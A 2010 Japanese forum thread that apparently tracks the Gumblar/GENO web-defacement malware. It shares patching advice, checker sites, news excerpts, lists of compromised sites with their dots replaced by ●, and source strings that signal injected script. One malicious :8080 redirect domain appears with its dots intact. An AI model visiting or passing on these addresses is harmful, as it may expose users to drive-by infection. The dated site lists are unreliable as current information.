【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
2010/03/08(月) 23:48:04感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
*** 通報したら重複を防ぐために宣言すること ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ6【8080】
http://pc11.2ch.net/test/read.cgi/sec/1266494350/
0002名無しさん@お腹いっぱい。
2010/03/08(月) 23:49:37行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
0003名無しさん@お腹いっぱい。
2010/03/08(月) 23:50:19下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0004名無しさん@お腹いっぱい。
2010/03/08(月) 23:53:41※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
0005名無しさん@お腹いっぱい。
2010/03/08(月) 23:58:27【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・Gumblar Checker 3(8080系用)
ttp://gumblar.s1.dynamitelife.net/ver3
・Gumblar.X Checker
ttp://gumblar.s1.dynamitelife.net/gumx/
0006名無しさん@お腹いっぱい。
2010/03/08(月) 23:59:3100071-6
2010/03/09(火) 00:05:26Gumblar().x、8080系ウイルス対処法。
↓
Gumblar(.x)、8080系ウイルス対処法。
変なとこでみすった・・・orz
0008名無しさん@お腹いっぱい。
2010/03/09(火) 00:10:43■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblar.s1.dynamitelife.net/index.php?url=$LINK&hids=on&code=on&chk=AUTO
Gumblar Checker 3=http://gumblar.s1.dynamitelife.net/ver3/result.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
0009名無しさん@お腹いっぱい。
2010/03/09(火) 00:50:59このスレ的には関係ないから無視すること
0010名無しさん@お腹いっぱい。
2010/03/09(火) 00:52:081人が通報したぐらいじゃ動かない所もある訳だし
0011名無しさん@お腹いっぱい。
2010/03/09(火) 03:51:511.ロシア(27.89%)
2.中国(26.52%)
3.米国(9.98%)
4.ブラジル(6.77%)
5.ウクライナ(5.45%)
6.英国(5.34%)
7.フランス(3.81%)
8.ドイツ(2.41%)
9.スウェーデン(1.6%)
10.スペイン(1.37%)
セキュリティ - ZDNet Japan
http://japan.zdnet.com/news/sec/story/0,2000056194,20367817,00.htm
セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9%。これに対して中国の割合は26.5%。過去の調査では
世界2位になってしまった米国は今回、3位(10%弱)となった。
PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅したにも関わらず、ロシア
の生産量が落ちていないことを指摘している。
PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Networkがいなくなった
ところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。「結果として、過去にないくらい
多くのウイルスやスパイウェアがロシアから出てきている。そして、マルウェアの複雑さが増している」
(Shevchenko氏)
さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織よりも追跡しや
すかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティングサービスが、マレーシアや中国、
パナマ、シンガポール、タイ、トルコ、インドのサーバに目を向けている」
0012名無しさん@お腹いっぱい。
2010/03/09(火) 07:03:14ttp://www.atmarkit.co.jp/news/201001/31/twitter.html
カスペルスキーがサイバー犯罪の最新動向を説明
Twitterのアカウント、闇市場で1000ドルで売買も
フォロワー数やアカウントの利用スタイルによって価格は異なるが、
Twitterのアカウントは闇市場で1アカウントあたり500ドルや1000ドルで売買
されている――。そんなショッキングな数字を挙げて、最新のサイバー犯罪
の潜在的危険性について警鐘を鳴らすのは、ロシアのセキュリティ企業、カ
スペルスキーのセキュリティ研究者、ドミトリー・ベストゥージェフ氏だ。
カスペルスキーは2010年1月28日にモスクワで記者向けの説明会を開
催。この中でベストゥージェフ氏は「あなたの値段はいくら?」(How much do
you cost?)と題した講演を行い、闇市場の生々しいデータや動向について
語った。ベストゥージェフ氏の講演を中心に、同社のセキュリティ専門家の
話をお伝えする。
0013名無しさん@お腹いっぱい。
2010/03/09(火) 07:04:10ttp://www.atmarkit.co.jp/news/201001/31/twitter.html
なぜブラジルに多いのか?
サイバー犯罪者が集まる闇市場は、一般の市場とまったく同様に市場間の競
争や、価格決定のメカニズムが機能する売買市場となっている。売買の「場」と
なるWebサイトも、ちょうど広場やストリートで非合法の物品を売買するのと同様
に、常に各地の警察当局やISPとイタチごっこを繰り返している。
新興国のISPを中心に、犯罪者は集散を繰り返し、メールアカウント、クレジット
カード番号、SNSアカウントなどを売買しているという。ホストしているISPが闇市
場を強制的にシャットダウンすることもあるが、問題はサイバー犯罪関連の法整
備が遅れているために、こうした犯罪行為に対するリスクが低くなっているケース
があることだという。例えば、銀行のアカウントやクレジットカード情報を盗み出す
「Trojan-Bankers」と呼ばれるマルウェアの発信源のトップはブラジルが26%でダ
ントツに高いが、この背後には「1931年に制定された法律で処理しているため、
初犯は無罪放免。2度目にようやく投獄される」(ベストゥージェフ氏)という事情が
あるという。
捕捉されるリスクが低いことに加えて、高度に分業が進んでいることも、サイバー
犯罪に手を染める人が後を絶たない理由だ。コードを書くだけの人、ボットネットを
レンタルする人、マルウェアやスパムをばらまいてアカウントを集める人、実際に
銀行口座からお金を引き出す人、マネーロンダリングをする人、こうした人々を引
き合わせるオーガナイザーなどというように役割が細分化されている。コードだけ
書く人は、被害者の顔を見ることもないので、犯罪という意識も希薄になりやすい。
0014名無しさん@お腹いっぱい。
2010/03/09(火) 07:04:53ttp://www.atmarkit.co.jp/news/201001/31/twitter.html
偽アンチウイルスソフトの年間被害額は1億5000万ドル
カスペルスキーのような世界的セキュリティ企業ですら、具体的な犯罪者像や正
確な市場規模は把握していないというが、サイバー犯罪者の多くは、暴力や麻薬
取引に関係する「犯罪者」と異なり、見るからに犯罪者の風貌ではないのではない
か、という。1つの仮説は、ITのスキルはあっても職がない途上国や新興国の若者
が関与しているケースが多いのではなか、というもの。ブラジルの事例でこれが確
認されたこともあるという。
闇市場の規模については、例えば近年被害が急増している「Fake AV」と呼ばれる
偽アンチウイルスソフトで、FBIへ寄せられた苦情を元に1億5000万ドルの被害額と
いう試算があるという。Fake AVに感染したPCにはポップアップ画面で多数のウイル
スに感染していると警告が出て、ウイルスの駆除のために正式版にアップグレード
するよう促される。Fake AVの画面は正当なアンチウイルスソフトのように見え、価格
も妥当。多くの人が被害にあっている。このFake AVは300種程度の存在が確認され
ており、そこから「最低でも1万人規模の犯罪者が関与している可能性がある」(イギ
リス担当シニア・リージョナル・リサーチャー デイビッド・エム氏)という。
0015名無しさん@お腹いっぱい。
2010/03/09(火) 07:05:34ttp://www.atmarkit.co.jp/news/201001/31/twitter.html
警戒レベルが低いSNSのアカウントには高い価値
闇市場でやり取りされる「情報」の価格はさまざまだ。例えば「クレジットカード番号
は、国やカード会社によって価格は違う」(ベストゥージェフ氏)といい、アメリカ在住者
のVISA、マスターカードなら1件当たり2ドルだが、同じカードでも英国在住者のもので
あれば4ドル、オーストラリアなら5ドル、EUなら6ドルなどとなる。ゴールドカード、プラチ
ナカードになればさらに価格は上がる。銀行のアカウントであれば、残高やログインが
確認できているかなどの条件によって、価格は数ドルから数十ドルと変わる。
急激に狙われるようになっているのがSNSアカウントだ。カスペルスキーの調査によ
れば、2008年に約3万程度確認されていたSNSをターゲットにしたマルウェアは、2009
年に約6万と倍増したという。SNSは知人、友人、家族など信頼できる人を中心につな
がっていることが多いため、警戒感がない利用者が多い。
このため、例えば5000ユーザーとつながったFacebookのアカウントが300ドルで売ら
れるケースや、数百程度のフォロー、フォロワーを持つTwitterの女性アカウントが数百
ドルや1000ドルで売買されるケースも確認しているという。
0016名無しさん@お腹いっぱい。
2010/03/09(火) 07:06:15ttp://www.atmarkit.co.jp/news/201001/31/twitter.html
今後は地理情報を利用し、自動化された攻撃も
高度に発達するSNSやWebサービスを利用して、今後は攻撃の「自動化」が進行する
だろう。こう予測するのは「なぜ災害はいつもあなたの都市を襲うのか?」(Why does the
disaster always strike your city?)と題した講演を行ったステファン・テナス氏だ。
SNSでは地理情報や個人の嗜好といった情報を共有し、これが効率的なターゲット広告
というイノベーションを生み出す土壌になっているが、これは同時にサイバー犯罪者たち
にとっても利用価値の高い情報だ。
例えば、地理情報。ユーザーの住む場所を取得し、偽のニュースサイトに掲載する速報
に、あたかもそのユーザーが住む都市で爆破事件が起こっているかのように見せることが
可能だろうという。見ている全員が、それぞれ都市名の部分だけをすり替えられたニュース
を読む。さらに、Google翻訳のAPIを利用して都市名を英語名で埋め込むようなこともできる。
Koobfaceと呼ばれるマルウェアは、マルウェアをダウンロードさせるWebサイトへのリンク
が張られたメッセージを、Facebookのユーザーになりすまして投稿する。これをクリックした
Facebookの「友人」らは、偽のFlashプラグインへのアップデートを促されるという。このとき、
上記のような偽ニュースが使われれば、早く映像を見たいという気持ちからプラグインをダウ
ンロードする確率は上がるだろう。
現在、SNSで広がる攻撃は、初心者ユーザーをターゲットにしていて初歩的なソーシャル
・エンジニアリングを使っているものが多いという。それでも十分に効果があるからだ。カス
ペルスキーでは、2010年にはこうした攻撃の高度化や自動化が進むと見ているという。また、
モバイル端末を狙ったモバイルボットネットの登場も時間の問題だろうと考えているという。
0017名無しさん@お腹いっぱい。
2010/03/09(火) 07:06:56ttp://www.atmarkit.co.jp/news/201001/31/twitter.html
一般的なインターネットユーザーの値段:920ドル
従来、サイバー犯罪といえば銀行口座のパスワードやクレジットカード番号など直接的に
換金可能な情報が中心だった。このため、オンラインショッピングやオンラインバンキングを
利用しないPCユーザーは安全に感じているかもしれない。ところがベストゥージェフ氏は、
犯罪者にとっては狙う価値がないユーザーはいないという。
オークションサイトやSNSのアカウントには価値があるし、アカウントが何もないとしても、ネ
ットワーク接続されたPCには犯罪者にとって利用価値がある。DDoS攻撃のボットネットとして
バルクで換金できるからだ。2009年10月から広がっているGumblarシステムも、いまや7万台
のサーバが感染した状態のまま超広帯域のボットネットを構成している。ホームPCが7万台の
ボットネットに比べて1000倍程度のDDoS攻撃の能力があることを意味する。一切人手を介さ
ずにサーバとクライアント間で巧みに自己拡大するGumblarは2009年12月に活動をやめて感
染拡大は止まっているが、大規模なDDoS攻撃に備えている可能性のほかに、闇市場で攻撃
インフラの売買を始めている可能性も考えられるという。
ベストゥージェフ氏は講演の最後に、簡単なフォームを使って、ユーザー1人当たりが持つ情
報の値段を弾き出してみせた。メールアカウント3つ、残高が3000ドルの銀行のアカウントが1つ、
Facebookのアカウントが1つ、ブロードバンド接続のPCは2台、などと標準的なインターネットユー
ザーの有益な情報を闇市場の価格を元に計算すると、実に920ドル。闇市場においてデジタル
データは想像以上の高値で取り引されているようだ。
0018名無しさん@お腹いっぱい。
2010/03/09(火) 07:17:12(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー
0019名無しさん@お腹いっぱい。
2010/03/09(火) 07:27:290020名無しさん@お腹いっぱい。
2010/03/09(火) 07:33:33アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
アイティメディア株式会社 代表取締役社長 大槻利樹 アイティメディア株式会社 代表取締役社長 大槻利樹
0021名無しさん@お腹いっぱい。
2010/03/09(火) 11:10:100022名無しさん@お腹いっぱい。
2010/03/09(火) 11:42:490023名無しさん@お腹いっぱい。
2010/03/09(火) 13:52:50その中でgoogleセーフブラウジングが警告するのは18
0024名無しさん@お腹いっぱい。
2010/03/09(火) 14:11:09IDの出ないセキュ板は荒れるからなあ
いっそインターネット板にでも移住するかね
とはいえ最近はアップデート以外の対策が難しくなってきているから
このスレの役目も終わりに近づいてるのかも知れんが
0025名無しさん@お腹いっぱい。
2010/03/09(火) 14:14:42どれよ?
通報しるから列挙しる!
0026名無しさん@お腹いっぱい。
2010/03/09(火) 14:17:500027名無しさん@お腹いっぱい。
2010/03/09(火) 14:20:16増えそうだからちょっと待って
0028名無しさん@お腹いっぱい。
2010/03/09(火) 14:32:591kyujin●mecha-kawa●com
15kinyu01●kyashingoo●com
18kinrpg●com
21kinyu01●kyashingoo●com
21saimu04●manjusyage●com
34di●mecha-kawa●com
54wanwanmonogatari68●info/
brownie-mart●com
camp●kanji2001●com
e-risingsun●net
ebook-style●com/modules/xfsection/index●php?
ec●uuhp●com/~chillnet
faac3020●cpinet●jp/
hanahaitatsu●com/
hout●kanji2003●com
info0825●com/horihori
jkjom●com
joseiyodwife●com
junkankangoshi●com/cat1039
kagoshima●cool●ne●jp/fantasy_17/
kateikyousi-turtle●com
kei●keita-house●com/torabaayu_kansai
kinzokunensuu●com
kinzokunensuu●com/cat993
lblgs●com/
link●sfidalife●com
manjusyage●com/
mizuhaitatsu●com
park21●wakwak●com/~enyaraya/
pc-net●webinfo●jp
pipestudio●net
0029名無しさん@お腹いっぱい。
2010/03/09(火) 14:33:51shaddytoriyosesite●livedoor●biz
shogaishakoyo●com/
suemari●com/movie
sunrise●2pg●in/suzukiucar/index2●html
thismonky●com
unmeideai●com
www●1biyou●net
www●avis●ne●jp/~muranaka/
www●borneomarathon●com/jpn/home●html
www●dgnx●net/
www●g-mania●org
www●gocha-mix●net/cgi-bin/blog/
www●hct●zaq●ne●jp/cpacs503/
www●jpdrag●com
www●kadoma-c●com
www●kidscorner●jp/main●php
www●kikuyakikai●com
www●oumc-obog●com/2008/01
www●pzaki●com
www●ruco25●net
www●sesica●co●jp
www●shinnippo●co●jp/ssff/2006hiroshima/
www●sue-arc●com
www●win-win777●com/karuizawa/
www12●plala●or●jp/atakashi/sk
www13●plala●or●jp/metal-militia/
www2●odn●ne●jp/2711726/
www2●odn●ne●jp/2711726/index_02●html
www4●ocn●ne●jp/~ikl/member/index●htm
xn--com-r10es86d●jp/
0030名無しさん@お腹いっぱい。
2010/03/09(火) 14:59:590031名無しさん@お腹いっぱい。
2010/03/09(火) 16:56:450032名無しさん@お腹いっぱい。
2010/03/09(火) 17:00:09しかるべきところに通報し行政指導されるべきだ
0033名無しさん@お腹いっぱい。
2010/03/09(火) 17:19:250034コテハン
2010/03/09(火) 18:02:08//www●dd●iij4u●or●jp/~ceh3/span/juku/main●html
註:精神的ブラクラに注意w
「.substr」が目立つ
※チェッカー3は無反応。
0035名無しさん@お腹いっぱい。
2010/03/09(火) 18:12:55ttp://www.virustotal.com/jp/analisis/2b1cff715623cb02da57fc11fb3cecd9fbc40b69b27a73f1283b037d781294e9-1268125738
結果: 0/42 (0%)
0036名無しさん@お腹いっぱい。
2010/03/09(火) 18:16:55こんな感じか
//bild-de.careerbuilder.com.bile-de.thew.ru:8080
0037コテハン
2010/03/09(火) 18:19:32帰宅後に発掘作業を再開する・・・
でも、残業がががorz
0038名無しさん@お腹いっぱい。
2010/03/09(火) 18:47:230039名無しさん@お腹いっぱい。
2010/03/09(火) 19:15:07http://tinyurl.com/check8080
でひっかかる
0040コテハン
2010/03/09(火) 20:04:24//www●kikuyakikai●com/index●html ←再発
0041名無しさん@お腹いっぱい。
2010/03/09(火) 22:08:26何この俺得サイト
0042名無しさん@お腹いっぱい。
2010/03/10(水) 12:28:08公開日: 2010年3月10日 | 最終更新日: 2010年3月10日
ttp://www.microsoft.com/japan/technet/security/advisory/981374.mspx
問題を緩和する要素:
Internet Explorer 8 は、この脆弱性による影響を受けません。
0043名無しさん@お腹いっぱい。
2010/03/10(水) 12:37:400044名無しさん@お腹いっぱい。
2010/03/10(水) 12:59:57bikebikekaitori●com
0045名無しさん@お腹いっぱい。
2010/03/10(水) 15:25:35IE削除するかな
0046名無しさん@お腹いっぱい。
2010/03/10(水) 15:30:40自己責任で
0047名無しさん@お腹いっぱい。
2010/03/10(水) 17:50:28何時頃からかは知らんがEUのお偉いさん連中がWindowsにIEを初期付属してるのが法律違反だとかほざくからだろうけど
0048名無しさん@お腹いっぱい。
2010/03/10(水) 17:56:490049名無しさん@お腹いっぱい。
2010/03/10(水) 18:12:08coolfocus●jp/seminar/heartful
jaguarracing●xf●cz/xmlrpc●php
mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
shop●relax-living●net/bike11/
www●elmwoodguestcottage●com/
www●hakuchi●jp/57577/
www●hakuchi●jp/OTSUYA/
www●hervochapiteaux●be
www●i-paradise5●jp/~simple/otona/index●php
www●mfreep●com
0050名無しさん@お腹いっぱい。
2010/03/10(水) 20:29:39http://tsushima.2ch.net/test/read.cgi/news/1268217548/
0051名無しさん@お腹いっぱい。
2010/03/11(木) 01:03:030052名無しさん@お腹いっぱい。
2010/03/11(木) 14:35:14//www●kiyasuisan●co●jp
↓
//gabler-bayreuth●de/cgi-bin/default●php
↓
//alicosrl●it/templates/403●shtml●php
--
//gabler-bayreuth●de/
↓
//pecsa●com●pl/
↓
//seovisiongroup●com/
すっ飛ばしまくって→あふぃ=メシウマ?
0053名無しさん@お腹いっぱい。
2010/03/11(木) 15:03:230054名無しさん@お腹いっぱい。
2010/03/11(木) 15:36:53ウィルスに感染するの?
0055名無しさん@お腹いっぱい。
2010/03/11(木) 22:08:20ウイルスバスターがブロック(キリッ
>>34
ウイルスバスター(笑)がスルー
0056名無しさん@お腹いっぱい。
2010/03/11(木) 23:07:29感染自体は広がってるんだが
0057名無しさん@お腹いっぱい。
2010/03/12(金) 02:44:53セーフモードで起動してスタートアップに何ちゃらってやつと
ファイル名を指定して実行→regeditどうたらっていうのがあったと思うのですが
あのテンプレみたいの持ってる方いましたら貼ってもらえませんか?
0058名無しさん@お腹いっぱい。
2010/03/12(金) 02:46:43感染してるかと思ったら素直に再インストしろ
0059名無しさん@お腹いっぱい。
2010/03/12(金) 08:24:14そんなもんあっても1週間もあればウイルスのファイル名が変わるなんてざらだから役にたたん
普段から自動起動しているファイルを調べてないやつには判別もできん
素直にクリーンインスコしろ
0060名無しさん@お腹いっぱい。
2010/03/12(金) 10:36:300061名無しさん@お腹いっぱい。
2010/03/12(金) 11:06:30リカバリしてもまた感染するだろうなwww
0062名無しさん@お腹いっぱい。
2010/03/12(金) 14:24:14( ゚Д゚)ポカーン
0063名無しさん@お腹いっぱい。
2010/03/12(金) 14:40:48「dT.prototype =」
0064名無しさん@お腹いっぱい。
2010/03/12(金) 15:24:31www●jde-net●co●jp/engineering/index●php
0065名無しさん@お腹いっぱい。
2010/03/12(金) 17:59:52ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2182
>攻撃コードが公になったのは11日早朝。
>セキュリティベンダーの情報をもとに攻撃サイトが突きとめられ、
攻撃コードが拾われてしまった。
>このコードが使われると、回避策を適用していないIE 6/7では、
悪質なサイトにアクセスするだけでウイルスに感染してしまうおそれがある。
>コードは、現在も継続中のサイト改ざん攻撃にも即転用が可能で、被害が懸念される。
Mカフィー\(^o^)/オワタw
0066名無しさん@お腹いっぱい。
2010/03/12(金) 18:09:470067名無しさん@お腹いっぱい。
2010/03/12(金) 19:51:180068名無しさん@お腹いっぱい。
2010/03/12(金) 19:56:280069名無しさん@お腹いっぱい。
2010/03/12(金) 20:00:53使ってるのはFlash Playerとか落としに行ったやつ
0070名無しさん@お腹いっぱい。
2010/03/12(金) 20:29:07いや、ごめん、全部 俺のことなんだ
0071名無しさん@お腹いっぱい。
2010/03/12(金) 21:43:540072名無しさん@お腹いっぱい。
2010/03/12(金) 23:03:530073名無しさん@お腹いっぱい。
2010/03/12(金) 23:15:500074名無しさん@お腹いっぱい。
2010/03/13(土) 00:17:02セキュリティソフトなんか
無いんじゃないの?
0075名無しさん@お腹いっぱい。
2010/03/13(土) 01:20:46分からなきゃ何度クリーンインストールしても一緒じゃねえか
0076名無しさん@お腹いっぱい。
2010/03/13(土) 01:50:36そんなんで逆切れしてっからダメなんだ
0077名無しさん@お腹いっぱい。
2010/03/13(土) 06:08:56は?
0078名無しさん@お腹いっぱい。
2010/03/13(土) 11:22:500079名無しさん@お腹いっぱい。
2010/03/13(土) 12:01:200080名無しさん@お腹いっぱい。
2010/03/13(土) 13:23:17しかも、対応しにくいように徐々にウィルス進化中
0081名無しさん@お腹いっぱい。
2010/03/13(土) 13:45:210082名無しさん@お腹いっぱい。
2010/03/13(土) 13:54:12大学の研究ネタにもなってるとは知らなかったな
0083名無しさん@お腹いっぱい。
2010/03/13(土) 14:23:09アンチウイルスソフトでも未対応のやつ多そう
0084名無しさん@お腹いっぱい。
2010/03/13(土) 14:26:35ほんとの0dayなんかほとんどない
情弱以外関係ない
0085名無しさん@お腹いっぱい。
2010/03/13(土) 14:51:31|:::::::::::::;;;ノ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|::::::::::( 」 < なんにしろ対策してれば引っかからないし
ノノノ ヽ_l | ほんとの0dayなんかほとんどない
,,-┴―┴- 、| ∩_ 情弱以外関係ない
/,|┌-[]─┐| \ ( ノ______________
/ ヽ| | 情 | '、/\ / /
/ `./| | 弱 .| |\ /
\ ヽ| lゝ | | \__/
\ |  ̄ ̄ ̄ |
⊂|______|
|l_l i l_l |
| ┬ |
0086名無しさん@お腹いっぱい。
2010/03/13(土) 14:55:150087名無しさん@お腹いっぱい。
2010/03/13(土) 14:58:560day攻撃がしばらく問題だったんだよ
0088名無しさん@お腹いっぱい。
2010/03/13(土) 15:02:33いつ攻撃されてもおかしくない
0089名無しさん@お腹いっぱい。
2010/03/13(土) 15:03:090090名無しさん@お腹いっぱい。
2010/03/13(土) 15:04:19現実的でないこといってびびってるのか
LANけーぶるひっこぬけ
0091名無しさん@お腹いっぱい。
2010/03/13(土) 15:06:26ttp://www.kobe-np.co.jp/news/jiken/0002779319.shtml
0092名無しさん@お腹いっぱい。
2010/03/13(土) 15:07:41ハイリスク報知だし
0093名無しさん@お腹いっぱい。
2010/03/13(土) 15:21:06自治体は、やる気無いからなぁ
ttp://news.biglobe.ne.jp/social/699/ym_100307_6999091466.html
0094名無しさん@お腹いっぱい。
2010/03/13(土) 15:28:220095名無しさん@お腹いっぱい。
2010/03/13(土) 15:31:14どうせwindowsのパッチも当ててないし
0096名無しさん@お腹いっぱい。
2010/03/13(土) 16:44:230097名無しさん@お腹いっぱい。
2010/03/13(土) 16:52:54機密情報をShareで全力共有しそうだなw
0098名無しさん@お腹いっぱい。
2010/03/13(土) 17:11:58Adobe ReaderはVer.8のプレインストールのまま
Adobe Flash Player に関しては推して知るべし
つ〜かプリインストールのセキュリティソフト期限切れてるし...
0099名無しさん@お腹いっぱい。
2010/03/13(土) 18:05:130100名無しさん@お腹いっぱい。
